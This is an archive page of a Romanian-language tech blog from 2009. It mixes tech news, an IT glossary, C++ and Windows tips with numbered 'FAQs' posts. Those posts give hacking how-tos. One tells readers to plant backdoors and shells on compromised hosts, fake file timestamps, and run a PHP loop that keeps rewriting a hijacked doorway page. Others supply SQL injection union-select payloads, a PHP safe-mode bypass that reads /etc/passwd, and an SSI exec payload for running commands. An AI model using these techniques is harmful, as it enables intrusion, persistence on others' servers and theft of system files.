RicH and FamouS

       Home         Glosar IT                                                                                                                                                                                                              SUBSCRIBE NOW!
        

30.06.2009

2 milioane de dolari pentru 24 de melodii

America este ţara tuturor posibilităţilor, nimeni nu neaga asta. Numai că, uneori, această afirmaţie capătă un sens negativ şi devine o tragi-comedie. Altfel nu pot cataloga decizia unui judecător de a condamna o femeie la plata unor daune în valoare 1.92 milioane de dolari pentru că a descărcat 24 de melodii de pe Internet .

În spatele acestei aberaţii se află, bineînţeles, a tot cunoscuta organizaţie care cică apăra drepturile de autor ale industriei muzicale din Statele Unite, RIAA. Femeia respectivă a fost găsită vinovată şi a fost condamnată să plătească nici mai mult nici mai puţin de 80.000 dolari pentru fiecare melodie.

Printr-o matematică aparte, RIAA a calculat că atât i s-ar cuveni pentru cele 24 de melodii descărcate de femeia respectivă de pe Internet. RIAA a cerut daune de 1.92 milioane de dolari, iar judecătorul le-a considerat corecte.

Unul din principiile dreptului spune că pedeapsa trebuie să fie proporţională cu fapta. O asemenea condamnare consider a fi o aberantă totală.

29.06.2009

FAQs - №4

Problema: Ocupîndu-mă cu SEO, am întîlnit problema furtului a doorway-urilor. Cum mă pot proteja eu de această "năpastie"?

Rezolvare: Dacă tu faci doorway pe host, hack-uit prin Public Vulnerability pe motorul instalat acolo, atunci poti închide catalogul cu acel motor cu ajutorul chmod, modifică parola hash a administratorului în ceva de genul acesta haha&_$#@%. Dar de obicei aceasta puţin ce ajută, şi doorway-erii întîlnesc problema furtului doorway-urilor post factum, de aceea ţine minte următoarea regulă: pentru ca mai uşor să îţi poţi intoarce doorway-ul, lasă cîte mai multe backdoor-uri şi Shell-uri pe hostul hack-uit, însă cu toate acestea nu uita timpul de modificare a fişierelor prin comanda touch -t AnLunăZiOrăMinuteSecunde shell.php. Dupa furtul de doorway primul lucru care trebuie să îl faci este să găseşti şi să ştergi Shell-urile persoanelor nedorite ( aceasta se poate de facut cu ajutorul comenzii find - -mtime -60-grep.php ), apoi schimbă readresarea către shell-ul tău şi protejazăte cu ajutorul următorului scenariu-php:
Cod:
<_?php
ignore_user_abort(true);
set_time_limit(0);
while (!is_file('stop.dat'))
{
@chmod('/var/www/html/catalog',0777);
$textht='<_?php
header("Location: http://shell-ul_tău.com");
?>';
$fp = @fopen("/var/www/html/catalog/index.php","w");
@flock ($fp, LOCK_EX);
@fput ($fp, $textht);
@flock ($fp, LOCK_UN);
@fclose ($fp);
sleep(5);
}
?_>
P.S. Linia _ din cod se elimina
Încarcă scriptul cu acest cod ( schimbînd dinainte drumul către locaţia unde la tine stă doorway-ul ) într-un oarecare catalog pe server, disponibil din internet, şi lanseazăl în browser. După acesta poţi închide browser-ul. :) Scriptul cu periodicitatea de 5 secunde va rescrie fişierul cu readresarea către al tău, aşa că jefuitorii se vor mira foarte tare cînd vor înscrie fişierul propriu cu readresarea, însă în locul lui momentan va apărea altul.

27.06.2009

Feature | Entrepreneurial Thought Leader Highlights

The DFJ Entrepreneurial Thought Leaders Program este un curs săptămânal în serie unde liderii antreprenoriatului îşi împărtăşesc lecţiile de experienţa cu comunitatea Universităţii Stanford. Vorbitorii au inclus, Larry Page şi Eric Schmidt (Google), Mark Zuckerberg (Facebook), John Doerr (Kleiner Perkins Caufield & Byers), şi Guy Kawasaki (Garage Technology Ventures). Această listă de redare include zece "nuggets" antreprenoriale de înţelepciune de la acest program; arhiva completă de discuţii din cadrul Entrepreneurial Thought Leaders pot fi găsite pe site-ului STVP's Educators Corner.
  • Tom Byers: Poziţionarea pe piaţă şi importanţa Parteneriatelor
  • Ron Conway: Silicon Valley: Ground Zero pentru afacere
  • John Doerr: Tehnologii Brizante
  • Carly Fiorina: Dinamica de schimbare şi Frica
  • Peter Diamandis: Energetice de fonduri
  • Kathleen Eisenhardt: Componenţa Echipei
  • Marissa Mayer: Nu ucide proiectele, "drogheazăle"
  • Stan Christensen: Comunicare si negociere
  • Robert Sutton: Introducerea Creativitate într-o organizaţie
  • Guy Kawasaki: Crează un scop în compania dvs.
  • Carol Bartz: Piramidele, Nu Scările
  • Randy Komisar: Cele mai mari Succese sunt adesea crescute din eşecuri
  • Jeff Hawkins: Urmăreşte-ţi ţelul

26.06.2009

Antivirus Microsoft Morro => Security Essentials

Noul produs antivirus, care este pe cale de finalizarea a corporatie Microsoft, a schimbat numele din Morro în Security Essentials.

Pachetul antivirus va veni la schimb serviciului platit Windows Live OneCare, a cărei vânzarea de licenţe se va termina pe 30 iunie.

Security Essentials va avea funcţii de bază, suficient de mari pentru a putea concura cu soluţiile ieftine ale companiei Symantec şi McAfee. Aparent, Security Essentials va fi fară nici o suplimentare de securitate, precum ar fi instrumentele pentru crearea copiilor de siguranţă şi setarea fină a sistemului.

«Microsoft» a început testarea internă a pachetului antivirus la 1 iunie. Aparent, anume această asamblare acum cîteva zile a fost gasită pe Net. În prezent, îl puteţi descărca de pe cele mai mari reţele p2p în versiuni pentru sistemele de operare, Windows Vista, Windows 7 şi Windows XP. Disponibil atît pe 32 de biţi cît şi pe 64 de biţi.

Release-ul Microsoft Security Essentials va avea loc la sfârşitul acestui an, iar ieşirea versiunii beta publică, precum spun sursele apropiate de dezvoltatori, este programată pentru luna septembrie.

25.06.2009

FAQs - №3

Problema: Este posibil oare ca în programele create în Java să se supraîncarce buffer-ul?

Rezolvare: Nu. Verificatorul bytecode-ului ( bytecode verifier ) scanează bytecode-urile, extrăgînd informaţia despre tipul obiectelor în fiecare punct de executare a fragmentului de cod. Maşina virtuală Java protejează de ieşirea "peste hotarele" memoriei acordate - se face excluderea, cu toate aceste codul introdus nu va fi executat. Nu se poate întîmpla supraîncărcarea sau stack-ului, parametrii pentru instruirea byte-maşinii are tipul necesar, iar permisiunea către cîmpurile şi metodele obiectelor nu încalcă declaraţiile în clasele de reguli (public, private, protected).

_____________________________________________________

Problema: Fac o injectie, însă la ieşire nimic nu se primeste, dar ştiu 100% că boxele există?

Rezolvare: Se pare că trebuie utilizat operatorul LIMIT. Dacă cererea iniţială arată cam în felul următor:
http://target/script.php?p=-1 union select 1,2,user,4 from users/*
atunci adaugă limit şi încearcă (enumeră) n-urile:
http://target/script.php?p=-1 union select 1,2,user,4 from users limit n,1/*
unde n de la 0 la 9.

24.06.2009

Glosar IT (Freeware, Firewall, Filtre)

Freeware

Freeware reprezinta aplicatii tip software ce pot fi descarcate, stocate sau redistribuite gratuit. Materialele freeware sunt protejate prin drepturi de autor, ce nu permit decompilarea si revinderea sub titulatura proprie (spre deosebire de programele din domeniul public).


Firewall

Firewall este o aplicatie software ce protejeaza un server din cadrul unei retele informatice prin echiparea cu masuri de securitate de tipul: apelare inversa sau codare defensiva.


Filtre

Cunoscute si sub denumirea de rules (reguli), filtrele sunt utilizate pentru administrarea corespondentei personale. Aplicatiile software ce ofera suport pentru astfel de filtre permit crearea de reguli aplicabile anumitor actiuni de tipul: redirectionarea automata a mesajelor catre diferite dosare (aranjate in functie de adresa expeditorului), transmiterea de mesaje predefinte pentru anumiti corespondenti, precum si stergerea mesajelor ce includ in titlu un set predefinit de cuvinte.

23.06.2009

Arhivaţi fişiere într-o simplă imagine (.jpg files)



Un Video educaţional despre faptul cum puteţi transforma un simplu file de tip .jpg într-o arhivă ascunsă. Vizionare plăcută!

Telefoanele Nokia nu vor mai trebui reîncărcate

Exclamaţii aproape isterice precum "vai, mi s-a descărcat telefonul" sau "stai că trebuie să-l bag din nou la încărcat" ar putea deveni istorie în curând, graţie celor de la Nokia. Finlandezii lucrează în prezent la o tehnologie care va scuti utilizatorii de calvarul încărcării telefoanelor mobile anunţă Technology Review.

Principiul tehnologiei

Oamenii de ştiinţă care lucrează pentru Nokia Research Centre din Cambridge, Marea Britanie, sunt ocupaţi cu dezvoltarea unei tehnologii care realizează conversia undelor electromagnetice în semnal electric. Practic, această tehnologie va capta radiaţiile electromagnetice emise de unele componente ale telefoanelor mobile, precum propria antenă sau receptorul Wi-Fi, şi le va transforma în curent electric , ce va fi folosit de telefon.

Din fericire, această tehnologie nu este doar în stadiu teoretic. Oamenii de ştiinţă au creat deja un prototip care poate capta până la 5 miliwaţi. Problema este că cei 5 miliwaţi nu sunt suficienţi pentru încărcarea unui telefon. De aceea, cercetătorii au început deja să lucreze la un alt prototip care poate produce 50 de miliwaţi. Aceştia ar fi suficienţi pentru încărcarea nu foarte rapidă a unui telefon închis.

Când va fi gata

Întrebarea care stă pe buzele tuturor - când vom putea beneficia de această tehnologie - a primit un răspuns de la Markku Rouvala, unul din oamenii de ştiinţă implicaţi în acest proiect. Acesta a afirmat că un telefon care să se încarce singur de la propriile componente care emit radiaţii electromagnetice va putea fi produs peste 3 sau 4 ani.

Nokia are planuri mari legate de noua tehnologie. Este posibil ca finlandezii să producă telefoane care să se bazeze exclusiv pe aceasta, dar şi să o combine cu alte tipuri de încărcare ecologică, precum captarea energiei solare.

Când această tehnologie va deveni realitate, va fi una dintre cele mai importante invenţii din istoria telefoniei mobile şi numai. Funcţionând permanent, aceasta ar putea profita de timpul în care telefonul stă în standby pentru a-l încărca. Dacă va fi şi suficient de eficientă, această tehnologie ar putea ţine mereu telefonul la un nivel înalt de încărcare.

În plus, tehnologia aceasta ar putea fi implementată şi altor dispozitive mobile care au în preajmă unde electromagnetice. De exemplu, un laptop ar putea profita de ea pentru a se încărca atunci când este conectat la o reţea wireless.

22.06.2009

Mac OS X Tips & Tricks


1. Pentru a schimba un user's shell (cu Bash, de exemplu) pe OS X:
  • $ sudo niutil -createprop . /users/USER shell /bin/bash
2. Pune QuickTime în full screen mode:
  •  tell application "QuickTime Player"
    enter full screen display 1
    set the scale of movie 1 to screen
    play movie 1
    end tell
3. Captînd o regiune de ecran, puteţi să apăsaţi pe SpaceBar pentru a invoca în aparatul de fotografiat cursorul. După cum se mişca cursorul aparatului de fotografiat pe ecran, fereastra se va evidenţia. Click pentru a captura cea mai evidenţiată fereastra.
  • Command+Shift+3 => Captează ecranul într-un fişier PDF pe spaţiul de lucru
  • Command+Control+Shift+3 => Captează întregul ecran şi plaseazăl în clipboard
  • Command+Shift+4 => Captează o regiune de ecran într-un fişier PDF pe spaţiul de lucru
  • Command+Control+Shift+4 => Captează o regiune şi plaseaz-o în clipboard

21.06.2009

Firefox 3.5 RC1 - Încearcă

După ce a tărăgănat luni întregi lucrul la Firefox 3.5, Mozilla se pare că se apropie în sfârşit de lansarea versiunii finale. Până atunci, ca un semn că lucrările se apropie de final, de pe site-ul oficial poate fi descărcată prima versiune RC1 de Firefox 3.5 .

Firefox 3.5 aduce numeroase noutăţi tehnice şi mai puţine facilităţi direct accesibile utilizatorului obişnuit. Această versiune este un upgrade important mai mult pentru Internet la modul general (dezvoltatori de site-uri, tehnologii de dezvoltare etc.) decât pentru utilizator.

Printre noutăţile pe care le aduce Firefox 3.5 se numără:
  • Private Browsing - o sesiune specială de navigare în care nu sunt salvate niciun fel de informaţii
  • Trace Monkey - un nou motor de JavaScript mai performant
  • Geolocation - setări individuale de site în funcţie de locaţia utilizatorului
  • Suport pentru numeroase tehnologii noi de dezvoltare precum tag-uri HTML5 pentru conţinutul video şi audio

20.06.2009

FAQs - №2

Problema: Cum pot trece peste Safe-mode în ultimile versiuni PHP?

Rezolvare: Iată unele scripturi, care te vor ajuta să citeşti conţinutul file-urilor şi a fişierelor în sistemă atunci cînd e activat safe-mode: PHP <=4.4.7/5.2.3MySQL/MySQLi Safe Mode Bypass Vulnerability
Cod:
<_?php
file_get_contents('/etc/passwd');
$1 = mysql_connect("localhost","root");

mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT, INSERT ON a.a TO 'aaaa'@'localhost' ");
mysql_close($1);
mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))

print $row . chr(10);
?>
P.S. Linia _ din cod se elimina

_____________________________________________________

Problema: Cum pot depista că SQL-Injecţia se află anume în cererea SELECT, dar nu în cererea DELETE, UPDATE sau altele?

Rezolvare: Pentru aceasta se poate de încercat de pus la sfîrşitul cererei operatorul LIMIT. Lipsa errorii ne va comunica despre, faptul ca serverul lucrează cu MySQL (deoarece, precum ştim, LIMIT - nu e standartul Structured Query Language) şi, desigur, despre faptul că acolo întradevăr figurează operatorul SELECT. Însă în cazul în care nu e MySQL, atunci utilizatorul care atacă poate să încerce să pună GROUP BY 1 sau HAVING 1=1 - cereri, care se referă către standartul limbajului SQL şi care lucrează doar în operatorul SELECT. Aceste 2 metode pot afla tipul cererii şi pot stabili care va fi tehnica de hack mai departe a resursei.

19.06.2009

Glosar IT (FAQs, Encryption, Email)

FAQs

frequently asked questions - intrebari frecvente Sectiunile FAQ insumeaza fisiere text concepute pentru a solutiona problemele pe care utilizatorii le intampina in navigarea unui site Web sau in utilizarea serviciilor online.

Encryption - Cifrare

Cifrarea reprezinta procesul de modificare a datelor intr-o forma lizibila numai de catre destinatar. Pentru a descrifra mesajul, destinatarul informatiilor cifrate necesita o cheie valida de decriptare. In schemele de cifrare traditionala, expeditorul si destinatarul utilizeaza aceleasi chei pentru a cifra si descifra informatiile.

Schemele de cifrare publica incorporeaza doua chei: o cheie cu utilizare publica si una corespondenta, privata, detinuta numai de catre autor. Prin intermediul acestei metode, oricine poate trimite un mesaj cifrat cu ajutorul cheii publice, dar numai autorul detine cheia privata, necesara in descifrarea mesajului. PGP si DES sunt doua dintre cele mai populare metode de cifrare publica a datelor.

Email

Posta electronica faciliteaza transmiterea de mesaje cu ajutorul computerului personal, prin intermediul retelei locale, via Internet sau cu ajutorul unui serviciu online, de tipul CompuServe sau America Online, cu posibilitate de livrarea catre unul sau mai multi destinatari. Modul de functionare consta in transmiterea mesajului catre o casuta postala virtuala, urmand ca verificarea acesteia sa fie realizata direct sau prin intermediul unei aplicatii software automate.

18.06.2009

Opera Unite oferă file sharing

Compania Opera prezintă tehnologia Unite,care permite trensferul de fişiere între calculatoare fară utilizarea de servicii externe, raportă în comunicatul de presă Opera.

Utilizînd Opera Unite poţi transforma calculatorul propriu într-un server şi poţi deschide accesul liber la informaţiile stocate pe hard-disk, persoanelor externe. Aceasta necesită doar de acces la Internet şi un browser modern.

De exemplu, puteţi să ascultaţi muzică de pe hard-disk-ul de acasă, în timp ce te afli la birou. În cazul în care utilizaţi Unite la locul de muncă, puteţi examina documentele existente in el, din orice loc, unde există acces la Internet.

În prezent, folosind Opera Unite poţi deschide accesul la fişierele stocate pe PC, inclusiv muzică şi fotografii. De asemenea, pe computer, puteţi organiza chat-uri virtuale şi servicii de memento-uri. O altă funcţie Unite este de a crea un site local pe PC.

În scopul de a permite accesul la fişiere folosind Opera Unite, aveţi nevoie de a descărca o versiune specială a browser-ului Opera care suportă această tehnologie.Toate setările Unite se efectuiază prin intermediul acestui browser-ului, dar pentru un Remote Access la fişierele puteţi utiliza şi alte browsere.

17.06.2009

Google Mobile - rulabil pe Symbian S60

În mărinimia sa, combinată cu setea de a ajunge omniprezent şi a-şi întinde reclamele pe telefoanele noastre, Google anunţă disponibilitatea aplicaţiei Google Mobile pentru telefoanele care au ca sistem de operare Symbian S60 . Cum se ştie, telefoanele inteligente Nokia au acest sistem, plus câteva modele ale altor producători, precum Samsung, iar în curând şi Sony Ericsson.

Dincolo de accesul de pe telefonul mobil la serviciile Google, aplicaţia are tei caracteristici definitorii:
  • acces rapid - cele mai importante servicii (căutare, Gmail, Maps etc.) pot fi accesate direct din ecranul de stand by
  • localizare - cu ajutorul suportului GPS Google Mobile poate oferi informaţii relevante în funcţie de locaţia ta, de exemplu, restaurante aflate în apropiere
  • căutare facilă - Google mobile permite salvarea căutărilor şi oferă sugestii pentru textul introdus
Google Mobile pentru Symbian S60 poate fi descărcat direct de pe telefon de la adresa m.google.com sau poţi primi un link prin SMS introducând numărul de telefon la această adresă.

Koogle - Un Google Evreiesc

Evreii ultraortodocşi cărora rabinii le interziceau să navigheze pe Internet au acum la dispoziţie un nou motor de căutare “kosher” care se conformă standardelor utlraortodoxe.

Koogle, www.koogle.co.il, nu indexează materiale cu conţinut sexual explicit şi site-urile de stiri sau de cumpărături online care prezinta obiecte interzise evreilor ultraortodocşi, precum televizoare.

Managerul acestui site, Yossi Altman, a declarat că Koogle - un joc de cuvinte pornind de la numele cunoscutului motor de căutare Google - îndeplineşte standardele impuse de rabinii ortodocsi şi este recomandat de aceştia internauţilor evrei. Trebuie spus că evreii ultra-religioşi consideră indecente chiar şi fotografiile în care apar femei în ipostaze obişnuite. De ar da cu ochii de tabloidele noastre online…

16.06.2009

FAQs - №1

Problema: Cum e posibil transmiterea de fişiere de pe un server pe altul fară implicarea utilizatorului şi fară necesitatea de copiere a acestuia pe computerul propriu?

Rezolvare: Desigur pentru rezolvarea acestei probleme se poate utiliza FTP, dar eu totuşi aş prefera să scriu în PHP 2 scripturi:
  • Script-server server.php, care transmite conţinutul fişierului în următoarea cerere-POST:
    Cod:
    POST http://host.com/client.php HTTP/1.0
    Host: host.com
    Content-Type: multipart/form-data;
    boundary=1BEF0A57BE110FD467A
    Content-Length: numărul_de_simboluri_in_fişier (funcţia strlen())

    - 1BEF0A57BE110FD467A
    Content-Disposition: form-data;
    name="file";
    filename="NUMELE_FIŞIERULUI.TXT"
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    - 1BEF0A57BE110FD467A --
    Connection: Close
    Semnătura: conţinutul fişierului
  • Script-client client.php, care prinde fişierul încărcat din $_FILE['file']['tmp_name'].
_____________________________________________________

Problema:
În ce mod se poate de executat system commands în web-shell cu ajutorul PHP, dacă este activat Safe-mode şi nu am posibilitatea să încarc un web-shell în Perl?

Rezolvare: De ce oare toţi ţin minte despre executarea system commands cu ajutorul Perl şi PHP, şi din contra toţi uita despre un astfel de lucru precum SSI (Server Side Includes).
Acestea sunt directivele în fişiere de tip shtml, care se execută de către web-server fară ajutorul utilizatorului. Cu ajutorul SSI se poate de creat lucruri destul de interesante: începînd cu includerea de fişierelor şi terminind cu executarea de system commands. Deci SSI se include direct în corpul paginii web în forma:
Cod:
<_html>
<_body>
<_!--#exec cmd="ls - la/; cat/etc/passwd">
<_/body>
<_/html>
P.S. Toate _ din cod se elimina
Desigur, cînd vei intra pe site tu vei vedea executarea directivelor date de tine "ls - la/" şi "cat/etc/passwd". :)

15.06.2009

Glosar IT (Gopher, Gateway, FTP)

Gopher

Gopher este un sistem de returnare a informatiilor tip text, din mediul Internet. Cu ajutorul unui client de Gopher, utilizatorii pot accesa serverele online Gopher pentru a obtine resurse detaliate, in functie de cuvintele-cheie introduse. Deoarece programele de navigare Web includ caracteristicile clientului de Gopher, mediul Web surclaseaza acest sistem in clasificarea documentelor informatice.

Unul dintre avantajele cautarii cu ajutorul aplicatiei Gopher consta in optiunea de citire direct de pe server a documentelor text, fara a necesita copierea sau stocarea pe computerul personal a informatiilor accesate.


Gateway - Deschidere

Un gateway este un program sau echipament hardware ce transfera date intre retele informatice, termen cu utilizare frecventa in accesarea site-urilor Internet sau in transferul de mesaje tip e-mail intre diferite servere.


FTP

Protocol de transfer al fisierelor Acest tip de protocol Internet este utilizat pentru a copia fisiere intre diferite computere conectate la retea. Desi invechit, fara suport pentru compresie si cu utilizare a comenzilor Unix de criptare, FTP permite transferul de aplicatii freeware sau shareware cu ajutorul programelor ce interpreteaza comenzile complexe ale Unix, sau prin intermediul programului de navigare Web.

14.06.2009

Nemulţumirea UE faţă de Windows 7 E

La scurt timp după ce Microsoft a anunţat că nu va include Internet Explorer în sistemul de operare Windows 7 vândut în Europa, Uniunea Europeană îşi exprimă dezaprobarea faţă de decizia luată de compania americană, anunţă Forbes.

Uniunea Europeană investighează încă de la începutul anului piaţa browserelor web, învinuind Microsoft de politici anticoncurenţiale, contradictorii cu reglementările comunitare. Dacă investigările vor dovedi vinovăţia Microsoft, compania americană ar urma să fie, din nou, amendată de către Consiliul Uniunii Europene.

Pentru a evita acest lucru, Microsoft a anunţat pe data de 12 iunie că va vinde Windows 7 fără Internet Explorer, în Europa. În acest fel, oficialii gigantului american au crezut că vor scăpa de investigarea Uniunii Europene.

Răspunsul Uniunii Europene a venit rapid. Oficialii UE s-au declarat dezamăgiţi de modul în care Microsoft a înţeles să reacţioneze. Conform acestora, "decizia Microsoft nu oferă mai multe opţiuni, ci le elimină".

E greu de crezut că Microsoft va accepta vreodată să ofere, ca opţiune, instalarea altor browsere. În joc sunt foarte mulţi bani şi, din acest punct de vedere, browserele web nu trebuie să fie comparate cu nicio altă aplicaţie. Analogia cu alte tipuri de aplicaţii software incluse în sistemul de operare este falsă.

13.06.2009

Windows 7 E - Special pentru Europa

Consiliul Uniunii Europene s-a dovedit mult mai impunător decât buzunarele doldora de bani ale conducătorilor Microsoft. După numeroase avertismente şi câteva amenzi usturătoare (ultima de aproape 1 miliard de Euro) pentru practici anti-concurenţiale, gigantul din Redmond a decis să renunţe la integrarea browser-ului Internet Explorer în Windows 7. Desigur, este vorba despre o versiune specială, Windows 7 E, care va fi comercializată doar în statele din Uniunea Europeană.

Fie că sunteţi încântaţi sau, dimpotrivă, consideraţi că era mai bine ca IE să fie prezent în Windows 7, trebuie să vă adresaţi în mod special companiei Opera Software ASA (dezvoltatoarea cunoscutului browser Opera), cea care, la sfârşitul anului 2007, a dat în judecată Microsoft şi a cerut Comisiei Europene să-i oblige să renunţe la integrarea browser-ului în sistemul de operare. Iată că până la urmă s-a întâmplat.

Rezultatul la nivel global nu va fi unul dezastruos pentru Microsoft, însă în Europa va însemna scăderea semnificativă a cotei IE-ului. Se ştie că majoritatea utilizatorilor începători folosesc Internet Explorer pentru că le vine pe tavă şi nu ştiu să instaleze sau se tem să încerce diverse alternative. Astfel, Firefox va trece pe primul loc mai devreme decât ne aşteptam.

12.06.2009

Microsoft vine cu un nou antivirus

Vă mai amintiţi de RAV, antivirusul românesc achiziţionat de Microsoft acum câţiva ani? De atunci au tot circulat zvonuri cum că Microsoft va produce un antivirus. Acele zvonuri sunt confirmat azi de Microsoft.

Nume de cod Morro , antivirusul celor de la Microsoft va ateriza pe piaţă într-un moment în care ceilalţi producători de soluţii de securitate nu o duc foarte bine. Morro este, într-un fel, urmaşul produsului Live OneCare, un alt eşec înregistrat de Microsoft online.

Conform oficialilor Microsoft, Morro este testat în prezent chiar pe calculatoarele propriilor angajaţi şi în curând va fi oferit spre download sub forma unei versiuni beta. Morro va fi corespondentul soluţiilor low-end ale producătorilor de antiviruşi. Cu alte cuvinte, va fi capabil să detecteze o mulţime de viruşi, dar nu va reprezenta o suită completă, cu toate facilităţile corespunzătoare.

Reacţia Pieţii la declaraţia Microsoft se manifestă printr-o scădere de 1,6% a cotei companiei Symantec şi scăderea cu 1,8 % a acţiunilor companiei McAfee. După Indicele zilei de ieri, indexul companiilor de tehnologie NASDAQ a intrat în "zona roşie" cu 1,2 la sută. Analişti consideră că, investitorii se tem de o situaţie în care, vor fi "deteriorate" vînzările enorme a antivirusurilor de la companiile Symantec si McAfee bazate pe Windows OS, la apariţia pe piaţă a antivirusul de la Microsoft.

Ţinând cont că până la lansarea oficială a lui Windows 7 mai sunt câteva luni, nu ar fi imposibil să ne trezim cu acest antivirus inclus în sistemul de operare!.. Voi ce credeţi..?


Televiziune digitală de la Moldtelecom

Moldtelecom îţi oferă posibilitatea să vizionezi 10 canale TV direct pe calculatorul tău personal. Vizionează posturile şi emisiunile preferate, ascultă ultimele noutăţi şi bucură-te de noile posibilităţi a televiziunii digitale!

Lista canalelor TV:

  • PRIME
  • Moldova 1
  • TV7
  • NIT
  • PRO TV Chişinău
  • N4
  • MuzTV - Moldova
  • 2PLUS
  • TVC21
  • TB 3 Moldova

Serviciul este oferit gratuit în regim de test.
Pentru informaţii suplimentare sună la numărul 1181 (Serviciul Suport Clienţi Internet).


Vizionare plăcută!

11.06.2009

Liste virtuale (C++)

Atunci cand numarul de inregistrari ce trebuie incarcat intr-un control listview devine foarte mare, timpul necesar creste corespunzator. Ce optimizare s-ar putea face in acest caz?
Raspuns: o lista virtuala rezolva problema.

Pe scurt, o lista virtuala este un control listview care are setat stilul LVS_OWNERDATA. Aceasta nu mai trebuie sa tina intern informatiile pentru fiecare item ci doar, de fiecare data cand are nevoie (un item devine vizibil si trebuie afisat), cere aceste informatii ferestrei parinte trimitandu-i mesajul de notificare LVN_GETDISPINFO (via WM_NOTIFY).
Ceea ce avem de facut este:
  1. Setam stilul LVS_OWNERDATA.
  2. Setam numarul de item-uri cu CListCtrl::SetItemCountEx.
  3. Handluim LVN_GETDISPINFO pentru a-i da listei informatiile necesare.

Mai jos este un exemplu simplificat de lista virtuala implementata intr-o clasa derivata din CListView (MFC).

Exemplu
Cod:
// Override CListView::PreCreateWindow
// LVS_OWNERDATA style makes the list virtual
BOOL CVirtualListView::PreCreateWindow(CREATESTRUCT& cs)
{
cs.style |= LVS_REPORT | LVS_OWNERDATA;
return CListView::PreCreateWindow(cs);
}


Cod:

// Just set the virtual list items count
void CVirtualListView::FillList()
{
CListCtrl& list = GetListCtrl();
list.DeleteAllItems();
//...
int nItemsCount = 999999; // this is just an example!
list.SetItemCountEx(dwRecordsCount,
LVSICF_NOSCROLL|LVSICF_NOINVALIDATEALL);
}


Cod:
// LVN_GETDISPINFO notification handler function
// Set the text and icon only for the items which are about to be drawn
void CVirtualListView::OnGetdispinfo(NMHDR* pNMHDR, LRESULT* pResult)
{
LV_DISPINFO* pDispInfo = (LV_DISPINFO*)pNMHDR;
LV_ITEM* pItem = &(pDispInfo)->item;

if(pItem->mask & LVIF_TEXT)
{
// Set the text for the given item (use pItem->iItem, pItem->iSubItem, and pItem->pszText).
}
if(pItem->mask & LVIF_IMAGE)
{
// Set the icon for the given item (use pItem->iItem and pItem->iImage).
}
*pResult = 0;
}

10.06.2009

Memorie Virtuală

Memorie Virtuala (sau Swap file / Page file) este una dintre memoriile importante ale sistemului. Virtuala pentru ca se erijeaza in memoria RAM, astfel incat aplicatiile lacome la resurse sa fie pacalite cu memorie de pe hard disk in cazul in care memoria RAM se dovedeste insuficienta. De altfel cei de la Microsoft definesc memoria virtuala ca fiind: "stocare temporara utilizata de un computer pentru a executa programe care necesita mai multa memorie decit dispune computerul respectiv".

Fişier de paginare. Memoria virtuala este deservita de unul sau mai multe asa numite fisiere de paginare. Mai multe pentru ca se poate seta cate un astfel de fisier pentru ficare partitie in parte. Atunci cind situatia o cere, se apeleaza la un transfer de date intre memorie realam fizica RAM si spatiul disponibil pe aceste fisiere, in scopul de a elibera memoria RAM de constrîngeri mai puţin importante.
Atenţie: nu ştergeţi şi nu dezactivaţi fişierul de paginare!

Practică: în consecinţă, spaţiul alocat memoriei virtuale depinde direct de memoria RAM de care dispuneţi şi de tipul programelor pe care le rulaţi. În mod normal, la 2 GB de memorie RAM nu ar mai trebui sa se apeleze la memorie virtuală. Aşadar, în teorie aţi putea reduce la minimum spaţiul alocat acesteia. Dacă, din contra, primiţi constant erori prin care se reclamă insuficienţă de memorie, este clar ca trebuie să mariţi spaţiul în cauză.

Mărime: Dar cum? Şi mai ales care sunt valorile recomandate? În mod implicit, mărirea fiecîrui fişier de paginare va fi de 1,5 ori mai mare decât memoria voastră RAM (de exemplu , dacă aveţi 1 GB de RAM , memoria virtuală recomandabilă va fi de 1,5 GB ). Însă dacă necesitaţile de lucru o cer, se poate mări acest spaţiu sau se poate aduce la dimensiunea sa minimă. Iată cum:
  1. Accesaţi calea Start | Control Panel | System.
  2. În ferestra System Properties, activaţi registrl Advanced.
  3. Daţi clic pe butonul Settings aflat în secţiunea Performance.
  4. În ferestra Performance Options, activaţi registrul Advanced.
  5. În secţiunea Virtual memory, clic pe Change.
  6. În ferestra Virtual memory, alegeţi partiţia pentru care vreţi să stabiliţi mărimea fişierului de paginare (de obicei, se ţine activ fişierul de paginare numai pentru partiţia sistem).
  7. Bifaţi opţiunea Cumstom size şi introduceţi valoarea dorită in câmpul Initial size, însă nu mai mare decît cea afişată în cîmpul Maximum size.
În final, clic pe Set şi apoi confirmaţi cu OK. Puteţi închide toate ferestrele.
Atenţie: setarea valorii maxime a fişierului de paginare poate frîna viteza de lucru a sistemului !

Scurtătură. Sunteţi curioşi să vedeţi fişierul care conţine, de fapt, memoria voastră virtuală?
  • Apelaţi la funcţia Search a sistemului (Start | Search), alegeţi opţiunea All files and folders si partiţia pe care este instalat sistemul de operare.
  • Scrieţi numele fişierului căutat, şi anume pagefile.sis, în primul câmp.
  • Din meniul More advanced options, bifaţi opţiunea Search hidden files and folders ( fişierul căutat este ascuns de sistem ). Deoarece vi se va afişa şi mărimea fişierului, puteţi astefel afla de câta memorie virtuală dispuneţi.

09.06.2009

Glosar IT (HTTP, HTML, Helper applications)

HTTP

protocol de transfer al hypertextului Protocol utilizat pentru a transmite si receptiona datele via Web. Cand introduceti o adresa tip URL in programul de navigare Web, realizati o cerere HTTP catre un server Web pentru o pagina cu informatii (din acest motiv toate adresele paginilor Web incep cu prefixul “http://”).

HTML

Hypertext Markup Language HTML reprezinta o colectie de comenzi de aranjare a elementelor, ce creeaza documente hypertext (pagini Web). Cand accesati o adresa tip URL, programul de navigare Web interpreteaza comenzile HTML incluse in pagina si le utilizeaza pentru a aranja textul si elementele de grafica. Comenzile HTML acopera o gama variata de aranjare a textului (aldin si cursiv, liste, titluri de diferite marimi etc.) si prezinta totodata caracteristica de a include elemente de grafica si alte elemente non-text.

Dezvoltarea si administrarea standardelor HTML este coordonata de catre World Wide Web Consortium.

Aplicatii ajutatoare - Helper applications

